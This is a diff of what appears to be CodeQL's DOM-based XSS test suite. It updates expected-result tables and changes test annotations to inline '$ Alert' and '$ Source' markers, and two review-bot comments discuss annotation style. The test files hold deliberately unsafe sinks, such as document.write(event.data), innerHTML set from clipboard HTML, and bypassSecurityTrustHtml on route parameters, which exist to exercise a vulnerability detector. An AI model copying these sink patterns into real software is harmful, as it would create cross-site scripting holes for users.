Config | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... 
search) | provenance | Config | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | Config | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | Config | +| tst.js:50:34:50:34 | s | tst.js:51:18:51:18 | s | provenance | | +| tst.js:53:25:53:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:54:25:54:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:58:1:58:27 | [,docum ... search] [1] | tst.js:58:46:58:46 | x | provenance | | +| tst.js:58:3:58:26 | documen ... .search | tst.js:58:1:58:27 | [,docum ... search] [1] | provenance | | +| tst.js:58:46:58:46 | x | tst.js:60:20:60:20 | x | provenance | | +| tst.js:93:7:93:44 | v | tst.js:95:18:95:18 | v | provenance | | +| tst.js:93:7:93:44 | v | tst.js:120:18:120:18 | v | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | Config | +| tst.js:93:11:93:44 | documen ... bstr(1) | tst.js:93:7:93:44 | v | provenance | | +| tst.js:132:29:132:50 | window. ... .search | tst.js:135:29:135:29 | v | provenance | | +| tst.js:135:29:135:29 | v | tst.js:135:49:135:49 | v | provenance | | +| tst.js:142:40:142:61 | window. ... 
.search | tst.js:139:29:139:46 | xssSourceService() | provenance | | +| tst.js:161:9:161:41 | target | tst.js:164:28:164:33 | target | provenance | | +| tst.js:161:18:161:41 | documen ... .search | tst.js:161:9:161:41 | target | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:170:31:170:37 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:172:42:172:48 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:173:33:173:39 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:175:54:175:60 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:176:45:176:51 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:177:49:177:55 | tainted | provenance | | +| tst.js:168:19:168:42 | documen ... .search | tst.js:168:9:168:42 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:183:67:183:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:181:19:181:42 | documen ... 
.search | tst.js:181:9:181:42 | tainted | provenance | | +| tst.js:183:67:183:73 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:188:35:188:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:190:46:190:52 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:191:38:191:44 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:192:35:192:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:188:35:188:41 | tainted | tst.js:196:28:196:46 | this.state.tainted1 | provenance | | +| tst.js:190:46:190:52 | tainted | tst.js:197:28:197:46 | this.state.tainted2 | provenance | | +| tst.js:191:38:191:44 | tainted | tst.js:198:28:198:46 | this.state.tainted3 | provenance | | +| tst.js:192:35:192:41 | tainted | tst.js:202:32:202:49 | prevState.tainted4 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:209:28:209:46 | this.props.tainted1 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:210:28:210:46 | this.props.tainted2 | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:211:28:211:46 | this.props.tainted3 | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:215:32:215:49 | prevProps.tainted4 | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:231:39:231:55 | props.propTainted | tst.js:235:60:235:82 | this.st ... 
Tainted | provenance | | +| tst.js:239:23:239:29 | tainted | tst.js:231:39:231:55 | props.propTainted | provenance | | +| tst.js:269:9:269:29 | tainted | tst.js:272:59:272:65 | tainted | provenance | | +| tst.js:269:19:269:29 | window.name | tst.js:269:9:269:29 | tainted | provenance | | +| tst.js:285:9:285:16 | location | tst.js:286:10:286:10 | e | provenance | | +| tst.js:286:10:286:10 | e | tst.js:287:20:287:20 | e | provenance | | +| tst.js:292:10:292:17 | location | tst.js:294:10:294:10 | e | provenance | | +| tst.js:294:10:294:10 | e | tst.js:295:20:295:20 | e | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams] | provenance | | +| tst.js:315:7:315:43 | params | tst.js:316:18:316:23 | params | provenance | | +| tst.js:315:7:315:43 | params [MapValue] | tst.js:316:18:316:23 | params [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:315:16:315:43 | getTain ... hParams [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | tst.js:315:16:315:43 | getTain ... hParams | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams | tst.js:315:7:315:43 | params | provenance | | +| tst.js:315:16:315:43 | getTain ... 
hParams [MapValue] | tst.js:315:7:315:43 | params [MapValue] | provenance | | +| tst.js:316:18:316:23 | params | tst.js:316:18:316:35 | params.get('name') | provenance | Config | +| tst.js:316:18:316:23 | params [MapValue] | tst.js:316:18:316:35 | params.get('name') | provenance | | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | tst.js:327:5:327:12 | getUrl() [hash] | provenance | | +| tst.js:325:20:325:36 | document.location | tst.js:325:12:325:37 | new URL ... cation) [hash] | provenance | | +| tst.js:327:5:327:12 | getUrl() [hash] | tst.js:327:5:327:17 | getUrl().hash | provenance | | +| tst.js:327:5:327:17 | getUrl().hash | tst.js:327:5:327:30 | getUrl( ... ring(1) | provenance | Config | +| tst.js:332:7:332:39 | target | tst.js:333:12:333:17 | target | provenance | | +| tst.js:332:16:332:39 | documen ... .search | tst.js:332:7:332:39 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:340:16:340:21 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:339:19:339:42 | documen ... .search | tst.js:339:10:339:42 | target | provenance | | +| tst.js:340:16:340:21 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:344:21:344:26 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:347:18:347:23 | target | provenance | | +| tst.js:355:7:355:39 | target | tst.js:357:18:357:23 | target | provenance | | +| tst.js:355:16:355:39 | documen ... 
.search | tst.js:355:7:355:39 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:367:18:367:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:369:18:369:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:380:18:380:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:389:18:389:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:391:19:391:24 | target | provenance | | +| tst.js:364:16:364:39 | documen ... .search | tst.js:364:7:364:39 | target | provenance | | +| tst.js:369:18:369:23 | target | tst.js:369:18:369:29 | target.taint | provenance | | +| tst.js:374:3:374:8 | [post update] target [taint3] | tst.js:375:18:375:23 | target [taint3] | provenance | | +| tst.js:374:19:374:42 | documen ... .search | tst.js:374:3:374:8 | [post update] target [taint3] | provenance | | +| tst.js:375:18:375:23 | target [taint3] | tst.js:375:18:375:30 | target.taint3 | provenance | | +| tst.js:380:18:380:23 | target | tst.js:380:18:380:30 | target.taint5 | provenance | | +| tst.js:389:18:389:23 | target | tst.js:389:18:389:30 | target.taint7 | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:391:19:391:24 | target [taint8] | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:392:18:392:23 | target [taint8] | provenance | | +| tst.js:391:19:391:24 | target | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:24 | target [taint8] | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:31 | target.taint8 | tst.js:391:3:391:8 | [post update] target [taint8] | provenance | | +| tst.js:392:18:392:23 | target [taint8] | tst.js:392:18:392:30 | target.taint8 | provenance | | +| tst.js:399:7:399:46 | payload | tst.js:400:18:400:24 | payload | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... 
bstr(1) | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | Config | +| tst.js:399:17:399:46 | window. ... bstr(1) | tst.js:399:7:399:46 | payload | provenance | | +| tst.js:402:7:402:55 | match | tst.js:404:20:404:24 | match | provenance | | +| tst.js:402:15:402:34 | window.location.hash | tst.js:402:15:402:55 | window. ... (\\w+)/) | provenance | | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | tst.js:402:7:402:55 | match | provenance | | +| tst.js:404:20:404:24 | match | tst.js:404:20:404:27 | match[1] | provenance | | +| tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:48 | window. ... it('#') [1] | provenance | Config | +| tst.js:407:18:407:48 | window. ... it('#') [1] | tst.js:407:18:407:51 | window. ... '#')[1] | provenance | | +| tst.js:411:7:411:39 | target | tst.js:413:18:413:23 | target | provenance | | +| tst.js:411:16:411:39 | documen ... .search | tst.js:411:7:411:39 | target | provenance | | +| tst.js:413:18:413:23 | target | tst.js:413:18:413:89 | target. ... data>') | provenance | | +| tst.js:419:6:419:38 | source | tst.js:423:28:423:33 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:424:33:424:38 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:425:34:425:39 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:426:41:426:46 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:427:44:427:49 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:428:32:428:37 | source | provenance | | +| tst.js:419:15:419:38 | documen ... .search | tst.js:419:6:419:38 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:438:18:438:23 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:439:36:439:41 | source | provenance | | +| tst.js:436:16:436:39 | documen ... 
.search | tst.js:436:7:436:39 | source | provenance | | +| tst.js:439:36:439:41 | source | tst.js:439:18:439:42 | ansiToH ... source) | provenance | | +| tst.js:443:6:443:38 | source | tst.js:446:21:446:26 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:448:19:448:24 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:450:20:450:25 | source | provenance | | +| tst.js:443:15:443:38 | documen ... .search | tst.js:443:6:443:38 | source | provenance | | +| tst.js:454:7:454:46 | url | tst.js:456:19:456:21 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:457:26:457:28 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:458:25:458:27 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:459:20:459:22 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:469:22:469:24 | url | provenance | | +| tst.js:454:13:454:36 | documen ... .search | tst.js:454:13:454:46 | documen ... bstr(1) | provenance | Config | +| tst.js:454:13:454:46 | documen ... bstr(1) | tst.js:454:7:454:46 | url | provenance | | +| tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | provenance | Config | +| tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | provenance | Config | +| tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | provenance | | +| tst.js:491:7:491:39 | target | tst.js:492:18:492:23 | target | provenance | | +| tst.js:491:16:491:39 | documen ... .search | tst.js:491:7:491:39 | target | provenance | | +| tst.js:492:18:492:23 | target | tst.js:492:18:492:54 | target. ... "), '') | provenance | | | typeahead.js:9:28:9:30 | loc | typeahead.js:10:16:10:18 | loc | provenance | | | typeahead.js:20:13:20:45 | target | typeahead.js:21:12:21:17 | target | provenance | | | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:20:13:20:45 | target | provenance | | 
@@ -1248,18 +1248,18 @@ subpaths | optionalSanitizer.js:41:28:41:35 | tainted3 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | | optionalSanitizer.js:45:41:45:46 | target | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | | tooltip.jsx:18:51:18:57 | provide [source] | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:18:51:18:59 | provide() | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | tst.js:40:16:40:44 | baz(doc ... search) | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:46:16:46:45 | wrap(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | tst.js:34:16:34:44 | baz(doc ... search) | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:39:16:39:45 | wrap(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | | various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | various-concat-obfuscations.js:14:24:14:28 | attrs | various-concat-obfuscations.js:15:10:15:83 | '
    ' | various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js index 97d21371d082..5c933dceff32 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js @@ -1,16 +1,16 @@ -this.addEventListener('message', function(event) { - document.write(event.data); // NOT OK +this.addEventListener('message', function(event) { // $ Source + document.write(event.data); // $ Alert }) -this.addEventListener('message', function({data}) { - document.write(data); // NOT OK +this.addEventListener('message', function({data}) { // $ Source + document.write(data); // $ Alert }) function test() { - function foo(x, event, y) { - document.write(x.data); // OK - document.write(event.data); // NOT OK - document.write(y.data); // OK + function foo(x, event, y) { // $ Source + document.write(x.data); + document.write(event.data); // $ Alert + document.write(y.data); } window.addEventListener("message", foo.bind(null, {data: 'items'})); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js index 37d3388ee784..14d645d32c4f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js 
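Review bot: The two sinks in `foo` that are expected to produce no alert, `document.write(x.data)` and `document.write(y.data)`, lose their `// OK` marker, so nothing shows they are deliberate negative cases rather than lines nobody annotated. A plain comment that is not a `$` expectation would keep that, for example `document.write(x.data); // OK - x is the constant object bound below`; the reason is inferred from the `foo.bind(null, {data: 'items'})` call in this hunk. The same bare-marker removal appears in the angular-tempate-url.js, classnames.js, dates.js and encodeuri.js hunks. dates.js ends up mixed, since it keeps `// OK - time arg is safe` on two lines while `moment(taint).format()` is left unmarked. The body of `test` continues past the end of the hunk.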
@@ -1,15 +1,15 @@ angular.module('myApp', []) .directive('myCustomer', function() { return { - templateUrl: "SAFE" // OK + templateUrl: "SAFE" } }) .directive('myCustomer', function() { return { - templateUrl: Cookie.get("unsafe") // NOT OK + templateUrl: Cookie.get("unsafe") // $ Alert } }); -addEventListener('message', (ev) => { +addEventListener('message', (ev) => { // $ Source Cookie.set("unsafe", ev.data); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts index 6d1823c2f601..66cde9439328 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts 
@@ -21,29 +21,29 @@ export class AppComponent implements OnInit { ) {} ngOnInit() { - this.sanitizer.bypassSecurityTrustHtml(ɵgetDOM().getLocation().href); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(ɵgetDOM().getLocation().href); // $ Alert - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.params.foo); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParams.foo); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.fragment); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.paramMap.get('foo')); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParamMap.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.params.foo); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParams.foo); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.fragment); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.paramMap.get('foo')); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParamMap.get('foo')); // $ Alert this.route.paramMap.subscribe(map => { - this.sanitizer.bypassSecurityTrustHtml(map.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(map.get('foo')); // $ Alert }); - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].path); // NOT OK - though depends on route config - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameters.x); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.get('x')); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.params.x); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].path); // $ Alert - though depends on route config + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameters.x); // $ Alert + 
this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.get('x')); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.params.x); // $ Alert - this.sanitizer.bypassSecurityTrustHtml(this.router.url); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.router.url); // $ Alert - this.sanitizer2.bypassSecurityTrustHtml(this.router.url); // NOT OK - this.renderer.setProperty(this.document.documentElement, 'innerHTML', this.route.snapshot.queryParams.foo); // NOT OK + this.sanitizer2.bypassSecurityTrustHtml(this.router.url); // $ Alert + this.renderer.setProperty(this.document.documentElement, 'innerHTML', this.route.snapshot.queryParams.foo); // $ Alert } someMethod(routeSnapshot: ActivatedRouteSnapshot) { - this.sanitizer.bypassSecurityTrustHtml(routeSnapshot.paramMap.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(routeSnapshot.paramMap.get('foo')); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js index a0e75045a2eb..0d9f2d9fad21 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js 
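Review bot: On the `this.route.snapshot.url[1].path` line the free-text remark sits inside the expectation comment, `// $ Alert - though depends on route config`, so the words after `Alert` are part of what the expectation parser reads. If the inline-expectations syntax in use treats a second `//` as the start of an ordinary comment, which I believe it does but cannot confirm from this diff, the comment is safer written as `// $ Alert // though depends on route config`. That keeps the caveat readable (whether `url[1].path` is attacker-controlled depends on the route configuration) without risking the words being taken for extra tags. The enclosing `AppComponent` class starts above the hunk.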
@@ -4,15 +4,15 @@ import classNamesB from 'classnames/bind'; import clsx from 'clsx'; function main() { - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // NOT OK - let unsafeStyle = classNames.bind({foo: window.name}); - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; // $ Alert + let unsafeStyle = classNames.bind({foo: window.name}); // $ Source + document.body.innerHTML = `Hello`; // $ Alert let safeStyle = classNames.bind({}); - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // OK - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; + document.body.innerHTML = `Hello`; // $ Alert - document.body.innerHTML += `Hello`; // NOT OK + document.body.innerHTML += `Hello`; // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts index b87d5a43beea..79970a0e1b77 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts @@ -5,14 +5,14 @@ function paste(e) { if (!clipboardData) return; const text = clipboardData.getData('text/plain'); - const html = clipboardData.getData('text/html'); + const html = clipboardData.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } 
@@ -21,16 +21,16 @@ function paste(e) { export function install(el: HTMLElement): void { el.addEventListener('paste', (e) => { - $("#id").html(e.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.clipboardData.getData('text/html')); // $ Alert }) } document.addEventListener('paste', (e) => { - $("#id").html(e.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.clipboardData.getData('text/html')); // $ Alert }); $("#foo").bind('paste', (e) => { - $("#id").html(e.originalEvent.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.originalEvent.clipboardData.getData('text/html')); // $ Alert }); (function () { @@ -40,14 +40,14 @@ $("#foo").bind('paste', (e) => { if (!clipboardData) return; const text = clipboardData.getData('text/plain'); - const html = clipboardData.getData('text/html'); + const html = clipboardData.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -68,9 +68,9 @@ async function getClipboardData(e: ClipboardEvent): Promise } if (e.clipboardData.types.includes('text/html')) { - const droppedHtml = e.clipboardData.getData('text/html'); + const droppedHtml = e.clipboardData.getData('text/html'); // $ Source const container = document.createElement('html'); - container.innerHTML = droppedHtml; + container.innerHTML = droppedHtml; // $ Alert const imgs = container.getElementsByTagName('img'); if (imgs.length === 1) { const src = imgs[0].src; @@ -95,7 +95,7 @@ async function getClipboardData(e: ClipboardEvent): Promise const { data, inputType, isComposing, dataTransfer } = e; if (!dataTransfer) return; - const html = dataTransfer.getData('text/html'); - $("#id").html(html); // NOT OK + const html = dataTransfer.getData('text/html'); // $ Source + $("#id").html(html); // $ Alert }); })(); \ No newline at end of file 
